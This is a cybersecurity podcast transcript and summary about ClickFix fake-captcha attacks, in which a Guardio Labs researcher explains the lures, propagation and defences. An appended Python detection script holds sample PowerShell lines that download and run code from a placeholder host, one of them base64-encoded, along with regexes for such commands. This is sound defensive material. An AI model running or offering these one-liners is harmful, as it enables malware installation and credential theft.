A
You're listening to the CyberWire network, powered by N2K. And now a word from our sponsor. The Johns Hopkins University Information Security Institute is seeking qualified applicants for its innovative Master of Science in Security Informatics degree program. Study alongside world-class interdisciplinary experts and gain unparalleled educational, research and professional experience in information security and assurance. Interested U.S. citizens should consider the Department of Defense's Cyber Service Academy program, which covers tuition, textbooks and a laptop, as well as providing a $34,000 additional annual stipend. Apply for the fall 2026 semester and for this scholarship by February 28th. Learn more at cs.jhu.edu/mssi. Hello everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us.
B
This type of attack is trying to fool the visitors of a website into doing something that they are used to doing, like updating their browser in the early phases with a clear fake, or in this case solving a captcha. We are so used to doing that, so we are doing it once again. But in this case we are being fooled into doing something quite malicious, in this case running the attacker's code on our system.
A
That's Nati Tal, head of Guardio Labs. The research we're discussing today is "CaptchaGeddon: Unmasking the Viral Evolution of the ClickFix Browser-Based Threat." Can you walk us through how the attack actually works?
B
Yes. So as you all know, captchas are suddenly popping up on your screen and asking you to solve a puzzle or select where you see the traffic lights or buses and stuff like that. And this one is actually quite the same. You get this captcha screen out of the blue. It can be when you enter a new site, or just as a pop-up, which was the case in the early ages of this attack, a pop-up from some kind of advertisement, and you see this captcha and you say to yourself, okay, I need to solve it. In this case, when you click on "Verify you're human," you're asked to do something a bit different than usual, which is a bunch of keyboard shortcuts. You need to click, and then you are proving you are a human. But in this case you are actually lured into running this type of code that was copied to your clipboard in the background without you even knowing. And when you click on those buttons, you actually open up the Run window in your Windows system, you paste that malicious code into it and press Enter to execute it. So you think that everything is okay, but actually you just executed some malicious code that is now going and downloading probably an infostealer that is now being installed on your system, gathering all the information about you, about your browser, your credentials, your bank accounts, everything, sending it out to the attackers. And that's it. It's all done in a matter of milliseconds, actually, and you move on and everything is okay. You didn't even know that this was happening in the background.
A
Help me understand here. When the captcha initially pops up, am I visiting a legitimate website that has been compromised?
B
Interesting question. Because the propagation method of this type of attack evolved during the past year and a half. It started off mostly in what we call malvertising. You enter those websites, content websites, mostly on the gray side, the gray area of streaming websites or download websites, and you are kind of used to getting those annoying new tabs and pop-ups with different types of advertisements. And this type of propagation was used by the attackers to pop up a new captcha tab on your system. Instead of some kind of creative about a new product, you suddenly see this captcha. And because you're already visiting a website and you just click on something and you get a captcha, it looks legit in a way, because you are used to getting a captcha in this kind of flow. And this is where it all started. And because getting those types of clicks, or paying for them with malvertising, is the quick win for the attackers, they pay the bucks and they get visitors clicking on those captchas that are suddenly popping up on their screens. This is the easy way in. And they kind of used this method to kick it off and to see how effective it is. And because it was so effective, the narrative of a captcha window, they decided in the next evolution of this attack to get out of those more low-level advertising websites. Because usually the visitors of those websites are not the most, you know, the best types of victims. They want people with money, people with, you know, special social accounts they can steal; they want more money eventually. So they moved on to a more robust type of propagation that involves using some more advanced techniques. It's a bit more, I would say, expensive for them to use those kinds of propagations, but at the end they get much more valuable customers for their captchas.
And what we saw in the past half a year is their switch from that malvertising to more malicious ways of compromising websites, legit websites with many visitors, with great search engine ratings. So they usually get to those websites from your search results, and many new visitors, and they compromise those websites, mostly WordPress websites. We know about the history of WordPress and compromised websites, unfortunately. And they use these compromised websites to inject their own scripts into the website. So you visit these websites, and a few seconds after you start to read their content, a captcha is popping up on your screen, which is, again, quite usual to see. And you are used to that. And you also trust the website, because you know this website, it's legit, it's well known, but you don't know it was compromised. So this is where the captchas were brought to a new level of, first of all, trust. A new level of trust. A better narrative here, because those are real websites, and you can even brand this kind of fake captcha with the logo of this website and everything, so it looks totally legit. But eventually, to actually read the website, you need to solve this captcha, which means you need to infect your system with malware. In this case, yeah.
A
It strikes me that the brilliance of this, from just a social engineering point of view, is that the captchas are kind of a known and trusted nuisance. We hardly notice them when they pop up and we sort of reflexively click where we need to click and try to move on. So it seems to me like it really is effective in lowering our defenses because we're conditioned to complete them.
B
Exactly. And this is where most of the attackers these days are focusing their efforts: on flows that are common for us, that make it easy to get us distracted with those flows. And captcha is unfortunately a brilliant decision by them, because captchas are all around everywhere and so easy to replicate, to fake them. So this is quite a good narrative to use. And by the way, it's even worse than that, because I believe, again, it's not exactly where it all started, but it kind of took more traction once the genuine white-hat security community actually presented this kind of attack to the public as a red team simulation. Okay. And unfortunately, I love John Hammond, he's a good friend. But for the history, I guess he will be known as the one that presented this fake captcha to the world, although it kind of just enhanced it, because he already saw this kind of attack in the wild. But since then, most of the attacks were like forks of his GitHub repo. And following that, you know, it became captured.
A
We'll be right back. And now a word from our sponsor, ThreatLocker, the powerful Zero Trust enterprise solution that stops ransomware in its tracks. Allowlisting is a deny-by-default software that makes application control simple and fast. Ringfencing is an application containment strategy ensuring apps can only access the files, registry keys, network resources and other applications they truly need to function. Shut out cyber criminals with world-class endpoint protection from ThreatLocker. Think your certificate security is covered? By March 2026, TLS certificate lifespans will be cut in half, meaning double today's renewals. And in 2029, certificates will expire every 47 days, demanding between 8 and 12 times the renewal volume. That's exponential complexity, operational workload and risk unless you modernize your strategy. CyberArk, proven in identity security, is your partner in certificate security. CyberArk simplifies lifecycle management with visibility, automation and control at scale. Master the 47-day shift with CyberArk. Scan for vulnerabilities, streamline operations, scale security. Visit cyberark.com/47day, that's cyberark.com, the numbers 47day. Yeah. I have no doubt that John's intentions were in good faith, but at the same time he does take a lot of heat for having set that free on the world. I'm curious, how widespread is this campaign? Are there particular regions or industries that seem to be targeted?
B
It varies, because it started off, as I said, mostly in malvertising. In this case it's like spray and pray. You take it all around the world, because you know the conversion rate in this case is not high. So you just spray it all over and you get whatever you get. But in the last few months, instead of seeing it, you know, with more hits and more scale, you see it at a bit lower scale but more focused and more high quality, instead of just spray and pray with advertisements or malvertising. In this case, this concept is being used in more targeted, I guess also targeted victims, but more targeted ecosystems. Just for an example, you see all those WordPress sites being compromised. So those are one way to do that. Other ways are, I would say, poisoning social media with links that eventually take you to this captcha. We even saw some sponsored posts on Facebook about some recipes for cookies or something like that. But the link there goes to a captcha. So if you want the recipe, you need to solve the captcha. And this allows, by the way, the attackers to also use the advanced ad network of Facebook to target specific people. In this case, I don't know, cookie lovers, but you can use it of course for any kind of other audience, and a more high-valued audience in this case.
A
Right.
B
And we also see this, for example, one of the most targeted audiences, I guess, in the past year are users of Booking.com, end users, I mean, hotel owners or, you know, apartment owners that use this service to share their hotels. And those are being targeted with targeted phishing attempts to get their credentials to Booking.com and later on use this to target their visitors. So we saw tons and tons of attempts to get those Booking.com clients by presenting them some kind of phishing email. But instead of the classic, you know, "click here to solve the issue" and you have the phishing login page of Booking.com, instead you're going to a site that looks again like Booking.com, but you get this captcha instead. So it's even more legit than just trying to log in with your credentials on a fake page. You don't need the credentials, you will just steal everything with the credentials inside. So they're using this more cleverly in the past few months. Less scale a bit, but much more powerful in this case.
A
What about evasion and persistence here? I mean, what sort of tricks are these attackers using to bypass detection?
B
Well, it started quite simply at the beginning of days. It was a plain HTML page with shellcode, the PowerShell code that it copies to your clipboard, in plain sight. And everything is so easy to detect. But quite quickly, when it got more traction, they started to use those known tricks of obfuscating the code a bit, or changing PowerShell with caps and lower letters and everything like that. Really simple, but it works at the beginning of times. Today they are much more persistent with what they are doing, because they are actually generating those kinds of scams on the fly. And there are tons of ways to create a malicious PowerShell code, for example, so they are just generating a new one for every hit to the same captcha page. They are also trying to mitigate detection by security companies by redirecting to different kinds of pages along the way and not presenting specifically the code. You are looking for the PowerShell code in this specific page. And again, all those tricks are eventually easy to understand for security researchers and to add to their YARA rules or their detection mechanism. But because it's so powerful, they don't give up and always try to be more creative. So it's a race. Like almost every other type of attack, it's a race. It will continue forever as long as they are able to get value from this kind of attack. And as we can see, it's here for almost two years now, I think, from the very first time we saw that, and it's here to stay. So we really need to be more careful.
A
Well what are your recommendations then? I mean for both users and organizations, what are the best ways for them to protect themselves?
B
Well, first of all, being familiar with this kind of attack is the most important part of it, because again, for us as more techie users that are used to captchas and know exactly what they're doing, how they are doing that, it would be very, I don't know, strange for us to solve a captcha by running code on our system. So we won't do that. But people that are not so aware of this type of captcha, they just think, oh, it's a new type of puzzle we need to solve, so let's try it. But if they were aware that this type of attack is here, because again, the flow is the same: you need to open a command line in some way and paste code into it. So it will be there on all types of fake captchas if you are familiar with it. It's by far the most important part of mitigating it. But there are more, I don't know, more enterprise ways to deal with it. Of course, one of the suggestions we made a few months ago was for organizations, mostly, to just disable PowerShell on their users' computers, because most users today don't use PowerShell, of course those that are not coding on their computer, so just disable it. It's possible; it's one registry key to change. Organizations can do that with policy, and at least for that you're safe. For home users, by the way, it's also a possibility, because again, most home users don't use PowerShell, so it's one way to do that, but it's a bit patchy, of course. And again, the most important part of everything here is to get the right security layer for you. It's not enough to use the default security layers we have with our browser or our system. We really need something more powerful in between that will know to catch those types of attacks before they hit us.
A
Our thanks to Nati Tal from Guardio Labs for joining us. We've been discussing their work on "CaptchaGeddon: Unmasking the Viral Evolution of the ClickFix Browser-Based Threat." We'll have a link to their research in the show notes. And that's Research Saturday, brought to you by N2K CyberWire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire2. This episode was produced by Liz Stokes. We're mixed by Elliot Peltzman and Trey Hester. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here next time.
Date: September 20, 2025
Host: Dave Bittner (A), N2K Networks
Guest: Nati Tal (B), Head of Guardio Labs
This Research Saturday episode delves into the evolution of browser-based threats—specifically, a campaign researchers have dubbed "CaptchaGeddon," which weaponizes browser captchas to trick users into unwittingly running malicious code. Rather than relying on traditional downloads, these attacks hijack familiar user flows and psychological conditioning to gain access and steal information. Dave Bittner (host) speaks with Nati Tal from Guardio Labs about how these attacks work, their propagation, evasion tactics, and strategies for protection.
Social Engineering with Familiar Flows:
Attackers use fake captchas, a ubiquitous web element, to gain user trust and trick them into running code.
“This type of attack is trying to fool the visitors of a website into doing something that they are used to doing, like updating their browser in the early phases with a clear fake, or in this case solving a captcha."
— Nati Tal [01:43]
How it Works:
“You actually open up the Run window in your Windows system, you paste that malicious code into it and press Enter to execute it… it's all done in a matter of milliseconds."
— Nati Tal [02:32]
From Malvertising to Compromised Legit Sites:
“They compromise those websites... inject their own scripts... captcha is popping up on your screen, which is again, quite usual to see... you also trust the website because you know this website, it's legit, it's well known.”
— Nati Tal [04:34]
Leveraging Trust by Mimicry:
Attackers brand the fake captchas with site logos to maximize legitimacy, making it harder for users to spot the deception.
Lowered Defenses through Familiarity:
Captchas are a “trusted nuisance,” so users act reflexively, often without questioning authenticity.
“We hardly notice them when they pop up and we sort of reflexively click where we need to click and try to move on.”
— Dave Bittner [08:52]
Effectiveness:
The attack exploits this monotonous task—users are “conditioned to complete them” and may not notice subtle differences.
Global to Focused Reach:
“We even saw some sponsored posts in Facebook about some recipes for cookies or something like that. But the link there goes to a captcha... allows attackers... to target specific people.”
— Nati Tal [13:05]
Industry-Specific Targeting:
Booking.com hosts (hotel and apartment owners) were singled out with phishing emails leading to a Booking.com look-alike page that shows the fake captcha instead of a login form, so the attackers never need to harvest credentials directly.
Technical Evolution:
“They are actually generating those kinds of scams on the fly... redirecting to different kinds of pages along the way…”
— Nati Tal [16:19]
Continuous Arms Race:
Security firms and attackers are locked in an ongoing cycle of attack and defense.
Awareness & Education:
“Being familiar with this kind of attack is the most important part… if they were aware that this type of attack is here... it's the foremost important part of mitigating it.”
— Nati Tal [18:29]
Technical Controls:
"We really need something more powerful in between that will know to catch those types of attacks before they hit us.”
— Nati Tal [18:29]
On Social Engineering:
“Captcha is unfortunately a brilliant decision by them because captchas are all around everywhere and so easy to replicate, to fake them.”
— Nati Tal [09:19]
On Infamous Origins:
"I love John Hammond, he's a good friend. But for the history, I guess he will be known as the one that presented this fake captcha to the world, although it kind of just enhanced it because he already saw this kind of attack in the wild."
— Nati Tal [09:19]
On Continuous Threat:
“It will continue forever as long as they are able to get value from this kind of attack… it's here for more than... almost two years now I think from the very first time we saw that and it's here to stay.”
— Nati Tal [16:19]
This episode of Research Saturday spotlights a dangerous evolution in browser-based attacks: the weaponization of familiar user flows via fake captchas. The tactics leverage both technical evasion and psychological conditioning, moving from malvertising to widescale compromise of legitimate, high-traffic sites. Nati Tal emphasizes the critical importance of awareness, technical controls (like disabling PowerShell), and strong security layers to protect both organizations and individuals as these attacks become ever more sophisticated.
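Added here as an illustration, not code from the episode or from Guardio Labs: a Python triage pass over constructed process-creation events that flags the flow Tal describes, a PowerShell host started from the Run dialog (parent explorer.exe) whose command line hides its window, is base64-encoded, or fetches and runs remote code, including the upper/lower-case name obfuscation he mentions. The simplified event format, the sample lines and the case-flip threshold are assumptions.

```python
import base64
import re

HOSTS = {"powershell.exe", "pwsh.exe"}
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})", re.I)
FETCH_RE = re.compile(r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I)
URL_RE = re.compile(r"https?://", re.I)

# Constructed samples in a simplified Sysmon Event ID 1 shape (not real telemetry);
# the second carries base64 of a UTF-16LE one-liner, the form -EncodedCommand takes.
ENCODED_SAMPLE = base64.b64encode('iex (iwr "http://example.invalid/p")'.encode("utf-16le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\"
SAMPLE_EVENTS = [
    f"Image={PS}PoWeRsHeLl.exe | ParentImage=C:\\Windows\\explorer.exe | "
    'CommandLine=PoWeRsHeLl -w hidden -ep bypass -c "iex (iwr http://example.invalid/v.txt)"',
    f"Image={PS}powershell.exe | ParentImage=C:\\Windows\\explorer.exe | "
    f"CommandLine=powershell -NoP -W Hidden -EncodedCommand {ENCODED_SAMPLE}",
    f"Image={PS}powershell.exe | ParentImage=C:\\Windows\\explorer.exe | CommandLine=powershell",
]

def parse_event(line):  # 'Key=value | Key=value' -> dict
    return dict(part.split("=", 1) for part in line.split(" | "))
def exe_name(path):
    return path.rsplit("\\", 1)[-1].lower()
def case_changes(token):
    """Upper/lower flips in a name: PoWeRsHeLl -> 9, PowerShell -> 3, powershell -> 0."""
    letters = [c for c in token if c.isalpha()]
    return sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument, or '' when absent or undecodable."""
    m = ENC_RE.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", "ignore") if m else ""
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""
def indicators(ev):
    """ClickFix indicators present in one event; the Run-dialog parent is listed first."""
    if exe_name(ev.get("Image", "")) not in HOSTS:
        return []
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + decoded  # scan the visible and the decoded script together
    checks = [
        ("launched from Explorer (Run dialog)", exe_name(ev.get("ParentImage", "")) == "explorer.exe"),
        ("mixed-case binary name (case obfuscation)", bool(cmd) and case_changes(cmd.split()[0]) > 3),
        ("base64-encoded command", bool(decoded)),
        ("hidden window", bool(HIDDEN_RE.search(text))),
        ("downloads and runs remote content", bool(FETCH_RE.search(text) and URL_RE.search(text))),
    ]
    return [label for label, hit in checks if hit]
def triage(lines):
    """Alert only when the host came from Explorer AND shows another indicator,
    so a user who merely opens PowerShell via Win+R is not flagged."""
    hits = []
    for ev in map(parse_event, lines):
        reasons = indicators(ev)
        if len(reasons) >= 2 and reasons[0].startswith("launched from Explorer"):
            hits.append({"image": exe_name(ev["Image"]), "reasons": reasons})
    return hits
```

Run `triage(SAMPLE_EVENTS)` to see the two lure-style launches flagged while the plain `powershell` launch from the Run dialog passes; in a real deployment the same checks would sit over Sysmon or Windows 4688 events.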
For Further Reading:
See the show notes for a link to Guardio Labs' detailed research on this threat.